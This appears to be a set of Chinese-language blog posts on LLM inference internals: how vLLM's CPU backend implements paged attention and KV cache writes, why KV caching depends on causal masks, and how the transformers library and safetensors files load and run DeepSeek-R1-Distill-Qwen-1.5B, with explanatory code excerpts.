                    if seq_group_metadata.multi_modal_data:
                        self._compute_multi_modal_input(
                            seq_group_metadata, seq_data)
                else:
                    self._compute_decode_input_tokens(self.input_data,
                                                      seq_group_metadata,
                                                      seq_data, seq_id)

_compute_prompt_input_tokens和_compute_decode_input_tokens分别用于计算prefill阶段和decode阶段的token相关的数据，跟paged attention相关的是block table和slot mapping。我们以_compute_prompt_input_tokens看看

    def _compute_prompt_input_tokens(self, data: ModelInputData,
                                     seq_group_metadata: SequenceGroupMetadata,
                                     seq_data: SequenceData, seq_id: int):
        """
        Compute prompt input tokens, positions, block table and slot mapping.
        """
        token_chunk_size = seq_group_metadata.token_chunk_size
        block_size = self.runner.block_size

        block_table = seq_group_metadata.block_tables[seq_id]
        seq_len = seq_data.get_len()
        context_len = seq_data.get_num_computed_tokens()
        seq_len = min(seq_len, context_len + token_chunk_size)

        ...
        tokens = seq_data.get_token_ids()
        tokens = tokens[context_len:seq_len]
        token_positions = range(context_len, seq_len)
        token_types = seq_group_metadata.token_type_ids

        # For encoder-only models, the block_table is None,
        # and there is no need to initialize the slot_mapping.
        if block_table is not None:
            slot_mapping = [_PAD_SLOT_ID] * len(token_positions)
            for i, pos in enumerate(token_positions):
                block_number = block_table[pos // block_size]
                block_offset = pos % block_size
                slot = block_number * block_size + block_offset
                slot_mapping[i] = slot
            data.slot_mapping.extend(slot_mapping)

        # The MROPE positions are prepared in _compute_multi_modal_input
        data.input_positions.extend(token_positions)

        if data.token_type_ids is not None:
            data.token_type_ids.extend(token_types if token_types else [])

        # Update fields
        data.input_tokens.extend(tokens)
        data.num_prefills += 1
        data.num_prefill_tokens += len(tokens)
        data.query_lens.append(len(tokens))
        data.prefill_block_tables.append(block_table)
        data.seq_lens.append(seq_len)

block_table变量就是来自SequenceGroupMetadata的block_tables成员。这里的关键是计算了一个slot_mapping列表。在prefill阶段，token_positions的长度就是prompt的长度所以slot_mapping的长度就是seq len，slot_mapping中的每个值即为物理Block中的位置。这里slot_mapping有点像TLB，直接把token映射到了物理槽位。

注意看上面的_build_input_data，其实是对于seq group中每一个seq，都是计算了token相关信息，所以vLLM中的一次调度是以一个seq group为单位的。

开始推理

数据准备完成，可以准备推理，推理过程在CPUModelRunner.execute_model。set_forward_context用来设置contenxt，这里面包括把attenbackend和推理的cache engine关联到当前推理。

        with set_forward_context(model_input.attn_metadata, self.vllm_config,
                                 model_input.virtual_engine):
            hidden_states = model_executable(
                input_ids=model_input.input_tokens,
                positions=model_input.input_positions,
                intermediate_tensors=intermediate_tensors,
                **execute_model_kwargs,
                **multimodal_kwargs,
            )

我们以Qwen2ForCausalLM为例，先分析整体流程：

Qwen2ForCausalLM.forward
  -->self.model(Qwen2Model.forward)
    -->layer(Qwen2DecoderLayer.forward)
      -->Qwen2Attention.forward
        -->Attention.forward
          -->torch.ops.vllm.unified_attention
            -->self.impl.forward(TorchSDPABackendImpl.forward)
              -->PagedAttention.write_to_paged_cache
              -->self._run_sdpa_forward
              -->PagedAttention.forward_decode

这里不对流程进行详细分析，只看看跟paged attention相关的地方，主要函数为TorchSDPABackendImpl.forward。

class TorchSDPABackendImpl：
    def forward(
        self,
        layer: AttentionLayer,
        query: torch.Tensor,
        key: torch.Tensor,
        value: torch.Tensor,
        kv_cache: torch.Tensor,
        attn_metadata: TorchSDPAMetadata,  # type: ignore
        output: Optional[torch.Tensor] = None,
    ) -> torch.Tensor:
        ...
        attn_type = self.attn_type
        ...
        # Reshape the query, key, and value tensors.
        query = query.view(-1, self.num_heads, self.head_size)
        if key is not None:
            assert value is not None
            key = key.view(-1, self.num_kv_heads, self.head_size)
            value = value.view(-1, self.num_kv_heads, self.head_size)
        else:
            assert value is None

        if (attn_type != AttentionType.ENCODER and kv_cache.numel() > 0):
            # KV-cache during decoder-self- or
            # encoder-decoder-cross-attention, but not
            # during encoder attention.
            #
            # Even if there are no new key/value pairs to cache,
            # we still need to break out key_cache and value_cache
            # i.e. for later use by paged attention
            key_cache, value_cache = PagedAttention.split_kv_cache(
                kv_cache, self.num_kv_heads, self.head_size)

            if (key is not None) and (value is not None):
                if attn_type == AttentionType.ENCODER_DECODER:
                    ...
                else:
                    # Update self-attention KV cache (prefill/decode)
                    updated_slot_mapping = attn_metadata.slot_mapping

                PagedAttention.write_to_paged_cache(
                    key, value, key_cache, value_cache, updated_slot_mapping,
                    self.kv_cache_dtype, layer._k_scale, layer._v_scale)

        if attn_type != AttentionType.ENCODER:
            # Decoder self-attention supports chunked prefill.
            # Encoder/decoder cross-attention requires no chunked
            # prefill (100% prefill or 100% decode tokens, no mix)
            num_prefill_tokens = attn_metadata.num_prefill_tokens
            num_decode_tokens = attn_metadata.num_decode_tokens
        else:
            # Encoder attention - chunked prefill is not applicable;
            # derive token-count from query shape & and treat them
            # as 100% prefill tokens
            assert attn_metadata.num_encoder_tokens is not None
            num_prefill_tokens = attn_metadata.num_encoder_tokens
            num_decode_tokens = 0

        if attn_type == AttentionType.DECODER:
            # Only enforce this shape-constraint for decoder
            # self-attention
            assert key.shape[0] == num_prefill_tokens + num_decode_tokens
            assert value.shape[0] == num_prefill_tokens + num_decode_tokens

        output = torch.empty_like(query)
        if prefill_meta := attn_metadata.prefill_metadata:
            assert attn_metadata.seq_lens is not None
            if not prefill_meta.prefill_metadata.chunked_prefill:  # type: ignore
                self._run_sdpa_forward(output,
                                       query,
                                       key,
                                       value,
                                       prefill_meta,
                                       attn_type=attn_type)
            else:
                # prefix-enabled attention
                assert not self.need_mask
                import intel_extension_for_pytorch.llm.modules as ipex_modules
                output = torch.empty_like(query)
                ipex_modules.PagedAttention.flash_attn_varlen_func(
                    output[:prefill_meta.num_prefill_tokens, :, :],
                    query[:prefill_meta.num_prefill_tokens, :, :],
                    key_cache,
                    value_cache,
                    prefill_meta.query_start_loc,
                    prefill_meta.kv_start_loc,
                    prefill_meta.max_query_len,
                    prefill_meta.max_kv_len,
                    self.scale,
                    True,
                    prefill_meta.prefill_block_tables,
                    self.alibi_slopes,
                )

        if decode_meta := attn_metadata.decode_metadata:
            assert attn_type != AttentionType.ENCODER_ONLY, (
                "Encoder-only models should not have decode metadata.")
            # Decoding run.
            (
                seq_lens_arg,
                max_seq_len_arg,
                block_tables_arg,
            ) = decode_meta.get_seq_len_block_table_args(attn_type)

            PagedAttention.forward_decode(
                output[attn_metadata.num_prefill_tokens:, :, :],
                query[attn_metadata.num_prefill_tokens:, :, :],
                key_cache,
                value_cache,
                block_tables_arg,
                seq_lens_arg,
                max_seq_len_arg,
                self.kv_cache_dtype,
                self.num_kv_heads,
                self.scale,
                self.alibi_slopes,
                layer._k_scale,
                layer._v_scale,
            )

        # Reshape the output tensor.
        return output.view(-1, self.num_heads * self.head_size)

第一步，将本次的token对应的KV写入到KV cache。首先，把KV分开到key_cache和value_cache，通过PagedAttention.split_kv_cache函数。这里的kv_cache就是物理的Block。接着调用PagedAttention.write_to_paged_cache将当前的KV cache写入到物理Block中，该函数调用ops.reshape_and_cache->torch.ops._C_cache_ops.reshape_and_cache，

            key_cache, value_cache = PagedAttention.split_kv_cache(
                kv_cache, self.num_kv_heads, self.head_size)

            if (key is not None) and (value is not None):
                if attn_type == AttentionType.ENCODER_DECODER:
                    # Update cross-attention KV cache (prefill-only)
                    # During cross-attention decode, key & value will be None,
                    # preventing this IF-statement branch from running
                    updated_slot_mapping = attn_metadata.cross_slot_mapping
                else:
                    # Update self-attention KV cache (prefill/decode)
                    updated_slot_mapping = attn_metadata.slot_mapping

                PagedAttention.write_to_paged_cache(
                    key, value, key_cache, value_cache, updated_slot_mapping,
                    self.kv_cache_dtype, layer._k_scale, layer._v_scale)

reshape_and_cache最终调到了csrc/cpu/cache.cpp中的同名函数。

void reshape_and_cache(torch::Tensor& key, torch::Tensor& value,
                       torch::Tensor& key_cache, torch::Tensor& value_cache,
                       torch::Tensor& slot_mapping,
                       const std::string& kv_cache_dtype,
                       torch::Tensor& k_scale, torch::Tensor& v_scale) {
  int num_tokens = key.size(0);
  int num_heads = key.size(1);
  int head_size = key.size(2);
  int block_size = key_cache.size(3);
  int x = key_cache.size(4);

  int key_stride = key.stride(0);
  int value_stride = value.stride(0);

  DISPATCH_MACRO(key.scalar_type(), "reshape_and_cache_cpu_impl", [&] {
    CPU_KERNEL_GUARD_IN(reshape_and_cache_cpu_impl)
    reshape_and_cache_cpu_impl<scalar_t>(
        key.data_ptr<scalar_t>(), value.data_ptr<scalar_t>(),
        key_cache.data_ptr<scalar_t>(), value_cache.data_ptr<scalar_t>(),
        slot_mapping.data_ptr<int64_t>(), num_tokens, key_stride, value_stride,
        num_heads, head_size, block_size, x);
    CPU_KERNEL_GUARD_OUT(reshape_and_cache_cpu_impl)
  });
}

最终调用到reshape_and_cache_cpu_impl函数，这个函数本质就是根据slot_mapping获取当前token对应在物理Block中的slot，然后将当前的KV写入到slot中，大概如下：

TorchSDPABackendImpl.forward在把当前的KV写入到KV cache后，根据是prefill阶段还是decode调用相应的函数，如果是prefill阶段，调用self._run_sdpa_forward，这个函数不需要参考前面的KV，是自己计算的attention。PagedAttention.forward_decode则是用来计算decode阶段的attention，我们知道，decode阶段attention的计算是以来于所有之前的KV的，所以这里会引用之前的KV。

我们先看看调用PagedAttention.forward_decode的参数，有3个重要参数通过decode_meta.get_seq_len_block_table_args函数获取的。

        if decode_meta := attn_metadata.decode_metadata:
            assert attn_type != AttentionType.ENCODER_ONLY, (
                "Encoder-only models should not have decode metadata.")
            # Decoding run.
            (
                seq_lens_arg,
                max_seq_len_arg,
                block_tables_arg,
            ) = decode_meta.get_seq_len_block_table_args(attn_type)

            PagedAttention.forward_decode(
                output[attn_metadata.num_prefill_tokens:, :, :],
                query[attn_metadata.num_prefill_tokens:, :, :],
                key_cache,
                value_cache,
                block_tables_arg,
                seq_lens_arg,
                max_seq_len_arg,
                self.kv_cache_dtype,
                self.num_kv_heads,
                self.scale,
                self.alibi_slopes,
                layer._k_scale,
                layer._v_scale,
            )

参数seq_lens_arg，这个表示当前该seq group中，处于decode状态中的seq的长度list。参数max_seq_len_arg表示这个seq group中，最长的seq的长度。参数block_tables_arg表示这个seq group中，每个seq 的block_table，但是有可能有的seq的block_table长有的短（注意这里的block实际是物理Block ID），所以需要进行pad，将短的补长。

            block_tables = make_tensor_with_pad(
                self.input_data.decode_block_tables,
                pad=0,
                dtype=torch.int32,
                device="cpu",
            )
  
def make_tensor_with_pad(
    x: list[list[T]],
    pad: T,
    dtype: torch.dtype,
    *,
    max_len: Optional[int] = None,
    device: Optional[Union[str, torch.device]] = None,
    pin_memory: bool = False,
) -> torch.Tensor:
    """
    Make a padded tensor from 2D inputs.

    The padding is applied to the end of each inner list until it reaches
    `max_len`.
    """
    np_dtype = TORCH_DTYPE_TO_NUMPY_DTYPE[dtype]
    padded_x = make_ndarray_with_pad(x, pad, np_dtype, max_len=max_len)

    tensor = torch.from_numpy(padded_x).to(device)
    if pin_memory:
        tensor = tensor.pin_memory()

    return tensor

完成上面三个参数之后，开始调用PagedAttention.forward_decode，调用ops.paged_attention_v1->torch.ops._C.paged_attention_v1，进而调用到csrc/cpu/attention.cpp中的paged_attention_v1，到paged_attention_v1_impl中的call成员函数，完整的计算注意力的过程太复杂了，我也还没完全看懂代码，这里只简单看看如何找到物理Block中存放的KV cache。

下面的代码在一个大循环中处理每一个seq，每个seq的长度存放在seq_lens数组中，每个seq的block_table放在seq_block_table中，后续根据seq占据的block数量(block_num)即可找到该seq对应的物理Block ID，从而找到对应的KV cache。

    int max_seq_len = max_num_blocks_per_seq * BLOCK_SIZE;
    int max_seq_len_padded = (max_seq_len + 15) & 0xFFFFFFF0;
    TORCH_CHECK((max_seq_len_padded * sizeof(float)) % 64 == 0);

    const int parallel_work_item_num = omp_get_max_threads();

    size_t logits_bytes =
        parallel_work_item_num * max_seq_len_padded * sizeof(float);
    float* logits = (float*)std::aligned_alloc(
        64, logits_bytes);  // Cacheline alignment for each context token.
                            // [parallel_work_item_num, max_seq_len_padded]

#pragma omp parallel for collapse(2) schedule(dynamic, 1)
    for (int seq_idx = 0; seq_idx < num_seqs; ++seq_idx) {
      for (int head_idx = 0; head_idx < num_heads; ++head_idx) {
        int seq_len = seq_lens[seq_idx];
        const int* seq_block_table =
            block_tables + max_num_blocks_per_seq * seq_idx;
        const int block_num = (seq_len + BLOCK_SIZE - 1) / BLOCK_SIZE;
        const int64_t kv_head_idx = head_idx / num_queries_per_kv;
        const scalar_t* __restrict__ q_vec_ptr =
            q + seq_idx * q_stride + head_idx * HEAD_SIZE;
        const int last_block_token_num = seq_len - (block_num - 1) * BLOCK_SIZE;
        float* __restrict__ thread_block_logits =
            logits + omp_get_thread_num() * max_seq_len_padded;

        // Compute logits
        for (int block_idx = 0; block_idx < block_num; ++block_idx) {
          const int64_t physical_block_idx = seq_block_table[block_idx];
          const scalar_t* __restrict__ k_block_cache_ptr =
              k_cache + physical_block_idx * kv_block_stride +
              kv_head_idx * kv_head_stride;
          float* __restrict__ head_block_logits =
              thread_block_logits + block_idx * BLOCK_SIZE;

          reduceQKBlockKernel<scalar_t, HEAD_SIZE, BLOCK_SIZE, x>::call(
              q_vec_ptr, k_block_cache_ptr, head_block_logits, scale,
              block_idx == block_num - 1 ? last_block_token_num : BLOCK_SIZE);
        }
        ...

transformer库中的kv cache分析与调试

2025-05-11T00:00:00+00:00

这篇文章记录了kv cache到底cache的是啥，以及为啥kv cache能够work。在研究kv cache的时候，有两个问题困扰我很久。

为什么说只有causal模型能够使用kv cache
transformer中默认代码里面没有使用causal mask

kv cache原理

我们知道，transformer里面一个重要环节是做self attention，而self attention又是通过qkv实现的。这里暂时不讨论qkv的深层含义，简单理解就是输入的token经过三个线性变化之后变为与原始输入维度相同的三个矩阵qkv。再经过下面的attention计算公式，计算出一个与原始输入维度相同的向量，该向量包含的各个token之间的相互关系。

这里我们把这个过程细化一下，来看看为什么可以进行KV cache，除以那个dk和softmax都不是重点，重点是三个矩阵相乘。首先看，qkv的产生。下面的S矩阵是一个 [3, 4]的矩阵，W是 [4, 4]的矩阵。这个3就是sequence length，表示有多少个token，W矩阵是训练出来的参数，在推理阶段是从safetensors加载上来的。

经过这么计算，我们生成了一个Q矩阵，同样的方法，我们生成了K矩阵和V矩阵。首先看看Q和K转置相乘。

这里我们得到一个[seq_len, seq_len]的矩阵，这个是各个token的自注意力权重矩阵，其中的Q1和K1是Q、K中的一行。接下来再通过乘以V得到最后的自注意力输出。

下面我们看看增加一行之后，自注意力权重矩阵的变化以及自注意力输出。当增加一行后，QKV矩阵都会相应增加一行。可以看到自注意力矩阵在在两个末尾都各自增加了一行。

自注意力输出。

红色表示变化了的。

kv cache本本质上就是保存了每个token计算时候的各层的kv值，然后等下一个token生成的时候能够增量的计算自注意力输出，也就是上面的K V矩阵中的黑色部分（老的K V）。

我在刚看kv cache的时候，大部分的文章都说必须是kv cache只能适用于decoder-only的模型，因为其有一个attention mask或者通常也叫causal mask，这个mask是一个下三角矩阵，用来将自注意力的上三角给mask掉。之所以要mask，是因为decoder-only模型中，每个token只需要关注之前的token，之前的token不用关注之后的token。

我最开始看Q和K转置相乘的时候觉得causal mask没啥用。所以一直在搜kv caches与causal mask的强相关的关系，直到看到这篇文章GLM-4 (6) - KV Cache / Prefill & Decode 之后才理解。Q和K转置相乘虽然能够从增量token计算出增量的QK相乘的矩阵，但是可以看到与V相乘之后，整个自注意力的输出每个元素都会变化。所以整个自注意力全部改变了，其实Q和K转置相乘之后再做一个softmax之后，自注意力权重矩阵已经变了。

来看看有了causal mask之后的。同样，假设首先有三个token，一次性算出了对应的Q K V。

增加一行：

我们看到有了causal mask之后，自注意力的输出也能够增量的根据单个token增加了。增量的自注意力再单独走一遍transformer矩阵，最终输出下一个token。从上面的矩阵也可以看到，自注意的输出跟历史所有的K V有关，所以我们把历史K和V都存起来，就叫KV cache，其实是两个cache。注意到transformer通常都有很多层，每个层的自注意力是单独算的，所以每个层都有自己的kv cache。

kv cache简单例子

上面是理论部分，本节我们通过一个简单的例子体会下KV cache的作用。参考这个仓库里面的代码，我们的测试代码如下：

import numpy as np # 导入 numpy 库

def get_attn_subsequent_mask(seq):
    #------------------------- 维度信息 --------------------------------
    # seq 的维度是 [batch_size, seq_len(Q)=seq_len(K)]
    #-----------------------------------------------------------------
    # 获取输入序列的形状
    attn_shape = [seq.size(0), seq.size(1), seq.size(1)]  
    #------------------------- 维度信息 --------------------------------
    # attn_shape 是一个一维张量 [batch_size, seq_len(Q), seq_len(K)]
    #-----------------------------------------------------------------
    # 使用 numpy 创建一个上三角矩阵（triu = triangle upper）
    subsequent_mask = np.triu(np.ones(attn_shape), k=1)
    #------------------------- 维度信息 --------------------------------
    # subsequent_mask 的维度是 [batch_size, seq_len(Q), seq_len(K)]
    #-----------------------------------------------------------------
    # 将 numpy 数组转换为 PyTorch 张量，并将数据类型设置为 byte（布尔值）
    subsequent_mask = torch.from_numpy(subsequent_mask).bool()
    #------------------------- 维度信息 --------------------------------
    # 返回的 subsequent_mask 的维度是 [batch_size, seq_len(Q), seq_len(K)]
    #-----------------------------------------------------------------
    return subsequent_mask # 返回后续位置的注意力掩码 

import torch
import torch.nn.functional as F

# 一个形状为 (batch_size, seq_len, feature_dim) 的张量 x
x = torch.randn(2, 3, 4) # 形状 (batch_size, seq_len, feature_dim)

# 定义线性层用于将 x 转换为 Q, K, V 向量
linear_q = torch.nn.Linear(4, 4)
linear_k = torch.nn.Linear(4, 4)
linear_v = torch.nn.Linear(4, 4)
# 通过线性层计算 Q, K, V
Q = linear_q(x) # 形状 (batch_size, seq_len, feature_dim)
K = linear_k(x) # 形状 (batch_size, seq_len, feature_dim)
V = linear_v(x) # 形状 (batch_size, seq_len, feature_dim)
# 计算 Q 和 K 的点积，作为相似度分数 , 也就是自注意力原始权重
raw_weights = torch.bmm(Q, K.transpose(1, 2)) # 形状 (batch_size, seq_len, seq_len)
# 将自注意力原始权重进行缩放
scale_factor = K.size(-1) ** 0.5  # 这里是 4 ** 0.5
scaled_weights = raw_weights / scale_factor # 形状 (batch_size, seq_len, seq_len)
# 对缩放后的权重进行 softmax 归一化，得到注意力权重

scaled_weights.masked_fill_(get_attn_subsequent_mask(x), -1e9)
attn_weights = F.softmax(scaled_weights, dim=2) 

# attn_weights = F.softmax(scaled_weights, dim=2) # 形状 (batch_size, seq_len, seq_len)
# 将注意力权重应用于 V 向量，计算加权和，得到加权信息
attn_outputs = torch.bmm(attn_weights, V) # 形状 (batch_size, seq_len, feature_dim)
print("x自注意力矩阵:", attn_weights)
print("x自注意力输出:", attn_outputs)

y = torch.rand(2, 1, 4)
z = torch.cat((x,y), 1)
Qz = linear_q(z) 
Kz = linear_k(z) 
Vz = linear_v(z) 

raw_weights1 = torch.bmm(Qz, Kz.transpose(1, 2)) 

scale_factor1 = Kz.size(-1) ** 0.5  
scaled_weights1 = raw_weights1 / scale_factor1 
scaled_weights1.masked_fill_(get_attn_subsequent_mask(z), -1e9)

attn_weights1 = F.softmax(scaled_weights1, dim=2)

attn_outputs1 = torch.bmm(attn_weights1, Vz) # 形状 (batch_size, seq_len, feature_dim)
print("z自注意力矩阵:", attn_weights1)
print("z自注意力输出:", attn_outputs1)

上面的代码随机生成一个batch_size为2，token大小为3, embbed_size为4的矩阵x，随后计算出其自注意力矩阵和自注意力输出，并且使用函数 get_attn_subsequent_mask 得到了causal mask矩阵。

可以看到当增加一个token(y)之后，整个注意力输出只增加了一行，就是新的y的自注意力输出，其余的注意力输出是一样的。

这个例子基本显示了kv cache下token的处理情况，即对于prompt整体作为输入(x)，生成kv cache，并且生成第一个token，随后用新的token(y)单独去走transformer，生成下一个token。下面我们实际调试看看transformer中情况。

transformer中的kv cache分析

本节调试transformer中使用kv cache和不使用kv cache的情况，使用的模型还是 DeepSeek-R1-Distill-Qwen-1.5B。

我们先来看看没有cache的情况，现在transformer都默认使用kv cache，所以需要再调用 AutoModelForCausalLM.from_pretrained 的时候指定 use_cache=False。整个代码如下：

# Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False)


input_text = "who are you?"

input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)

with torch.no_grad():
    outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id, use_cache=False)


output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)

model.generate开始下断点，进行调试，F11走起。首先看下面的，根据prompts生成第一个token的过程叫prefill，之后生成token过程叫decode。下面是即将开始首先得prefill过程。

进入Qwen2Model的forward中：可以看到这里输入了5个token。

进入Qwen2Attention的forward中，直到sdpa_attention_forward中。

可以看到这里在计算5个token的自注意力，这里用了多头，原理跟单头也是一样的。下面开始进入decode阶段。

注意看，这里把所有的6个token(prompt的5个）和新生成的一个直接传过来了。看看自注意力计算：

可以看到，也是6个都过来计算。所以在没有kv cache的情况下，每次的推理过程，都要计算所有token的自注意力。

下面我们看看使用kv cache的情况。使用代码如下：

# Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")


input_text = "who are you?"

input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)

with torch.no_grad():
    outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id)


output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)

prefill阶段如果使用use_cache，则会在 past_key_value保保存kv cache，每层一个。

本质就是每层一个key_cache，一个value_cache。

下面进入decode，注意看，下面的decode输入到模型的token只有一个了。

在计算自注意力时，只使用了本次token的Q，以及所有的KV。

而这里的K V是从上次K V和本次的k v 连起来的。所以这里使用了cache的KV矩阵。

到这里我们可能又有一个疑问了，在没有kv cache的时候，decode输入的token长度为seq len，在使用kv cache时候，decode只有一个token，这在整个transformer中运行时会不会缺少信息。其实不会，从下面的结构可以看到，各个层输入的其实都是1536，即token embedding之后的，并且从attention的计算可以看出，这个输入只与当前token的Q以及它之前的KV以及它自己的KV有关系。

在调试过程中，也可以看到，每次推理过程其实是会把所有token的下一个token概率打出来。

import torch
from transformers import AutoTokenizer, AutoModelForCausalLM


tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False)

print(model)

input_text = "who are you?"

input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)


with torch.no_grad():
    outputs = model(**input_ids, output_hidden_states=True)

logits = outputs.logits

logits = logits.squeeze(0)  # 形状变为 (sequence_length, vocab_size)

# 对每个位置取概率最高的token ID
predicted_token_ids = torch.argmax(logits, dim=-1)  # 形状 (sequence_length,)

# 解码所有预测的token
predicted_tokens = tokenizer.batch_decode(predicted_token_ids, skip_special_tokens=True)

# 打印每个位置的预测结果
for idx, token in enumerate(predicted_tokens):
    print(f"Position {idx}: {token}")

可以看到输入如下：

这个意思是说，最开始的token（start_of_sentence）下一个概率最大的是”)\n\n”，而第二个token ‘[sos] who’的下一个token是’is’，最终，’[sos] who are you?”这5个token下一个最大的就是’what’。每计算一个token，就会看看该token跟前面所有token注意力，通过这个主意来获取传统RNN的token之间的关系。

在研究causal mask的过程中，我发现进行在进行自注意力计算的时候attn_mask总是为空，例如下图，这不符合预期啊。

研究半天，后来总算找到其他人也有这个疑问，最终发现，torch.nn.functional.scaled_dot_product_attention 的参数 is_causal为True是，该函数会自己处理causal mask。代码参考这里,看到了熟悉的代码。

当我们将attention的实现切换为eager时，可以看到这个causal mask的计算。

model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False, attn_implementation='eager')

在 eager_attention_forward 中可以看到，attn_weght在经过softmax之后，呈现了下三角的样子。

总结

transformer中kv cache的简单分析就差不多结束了，这里以几个问题进行总结。

为什么说只有 Causal 模型能够使用 KV Cache

因为 Causal 模型中，有 sequence 的 attention mask，使得新 token 的注意力只依赖自身的 QKV 以及历史 token 的 KV。
为什么没有 Q Cache

从上面分析可以看到，历史的 Q 并没有使用，存起来没有意义。
Transformer 中默认代码里面没有使用 Causal Mask

使用了，是在 PyTorch 框架函数里面使用的。

Ref

GLM-4 (6) - KV Cache / Prefill & Decode

大模型推理加速：看图学KV Cache

探秘Transformer系列之（20）— KV Cache

We don’t need attention_mask in sdpa implementation?

大模型是如何进行推理的？-transformer的一点代码调试分析

2025-05-04T00:00:00+00:00

背景

最近在学习LLM，网上资料很多，很多都是洋洋洒洒讲了一堆原理，公式、图表一堆，这些当然很重要，但是如果能有系统性的相关代码分析与调试则更能让初学者有直观的体验。这部分不能说没有，但是也不多，并且比较零散。本文试图从transformer库的代码调试分析大模型的一次推理过程，让初学者能够理解推理的本质过程。下面的图展示了大模型一次推理的基本流程。初始的prompt输入之后，经过Tokenizer、Embeding，输入字符变成相关向量，并且经过大模型神经网络的一次forward，输出vocab size大小的tensor，每个表示该词的概率大小。最终选取概率最大的作为next token。

本文主要就是从代码层面分析这个流程。具体来讲，本文包括如下部分：

通过transformer使用大模型。在使用过程中，我们提出下面三个问题：模型文件究竟是啥？模型文件是如何加载到模型中的？具体某个模型比如qwen模型结构分析。并在随后的部分依次解答。
safetensors模型文件分析
safetensors模型文件加载到模型过程分析
模型的整体推理过程

本文使用的大模型为 DeepSeek-R1-Distill-Qwen-1.5B，这个模型能够在CPU上跑。

通过transformer使用大模型

下面的例子用于生成字符串。从输出可以看到，是选取每一个概率最大的词。

# Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")


input_text = "who are you?"

input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)

with torch.no_grad():
    outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id)


output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)

通过直接调用model，可以生成下一个最大概率的token。

# Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM


tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")

input_text = "who are you?"

input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)


with torch.no_grad():
    outputs = model(**input_ids, output_hidden_states=True)

logits = outputs.logits

# 取最后一个位置的 logits（假设是因果语言模型，预测下一个 token）
next_token_logits = logits[0, -1, :]

# 取概率最高的 token（贪心解码）
next_token_id = torch.argmax(next_token_logits).unsqueeze(0)

# 解码单个 token -> 文本
next_token_text = tokenizer.decode(next_token_id, skip_special_tokens=True)
print(f"Next predicted token: {next_token_text}")

行代码进行深入分析，探究大模型运行的过程。显然，上面代码work的过程包括：

model参数是怎么加载的
input经过tokenizer是如何经过网络的
具体的计算过程

为了理解model参数是怎么加载的，首先需要分析模型文件。

safetensors模型文件分析

模型中最大的文件是各个safetensors文件，比如下面这个，更大规模的模型甚至有几十个safetensors文件。

本节对safetensors文件进行详细分析。下面是一个简单的保存tensors为safetensors文件的程序。

# 安装依赖（如果未安装）
# pip install safetensors torch

import torch
from safetensors.torch import save_file

# 创建示例张量
tensor1 = torch.randn(3, 4)  # 全连接层权重
tensor2 = torch.ones(3)       # 偏置项
tensor3 = torch.tensor([[1.0, 2.0], [3.0, 4.0]])  # 其他张量

# 将张量组合成字典（键名可自定义）
tensors = {
    "fc1.weight": tensor1,
    "fc1.bias": tensor2,
    "custom_tensor": tensor3
}

# 保存为 safetensors 文件
save_file(tensors, "example.safetensors")

# （可选）验证文件是否存在并可加载
from safetensors.torch import load_file
loaded_tensors = load_file("example.safetensors")
print("Loaded tensors:", loaded_tensors.keys())

直接打开 example.safetensors，safetensors文件格式如下图所示：

根据这个图来分析 example.safetensors。这个格式就是简单的保存tensor。

从上可以看到，这个文件header size为C8，所以从D0开始是数据段。从08开始是header，就是json，每个tensor格式如下：

{
  "tensor1": {
    "dtype": "F32",
    "shape": [3, 3],
    "data_offsets": [0, 36]
  },
  "tensor2": {
    "dtype": "I64",
    "shape": [2],
    "data_offsets": [36, 52]
  }
}

dtype表示数据类型，shape表示样子，data_offset表示数据在数据区的offset。比如example.safetensors中custom_tensor的offset为0-16，表示数据是从D0到DF，数据格式为F32。问问大模型，可以看到相关数据是准确的。

下面的代码打印 DeepSeek-R1-Distill-Qwen-1.5B 模型的参数。

from safetensors import safe_open

def inspect_safetensors(file_path):
    with safe_open(file_path, framework="pt", device="cpu") as f:
        for key in f.keys():
            # 直接加载张量（内存高效，仅加载元数据）
            tensor = f.get_tensor(key)
            # 获取属性
            dtype = tensor.dtype
            shape = tensor.shape
            print(f"Tensor Name: {key}, Data Type (dtype): {dtype}, Shape: {tuple(shape)}")

inspect_safetensors("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B\\model.safetensors")

所以整个safetensors的内容就是各个tensor的值，推理的核心过程就是将这些值加入到内存或者GPU显存，然后将输入tensor进行神经网络的计算，最终得到一个tensor。

safetensors模型文件加载到模型过程分析

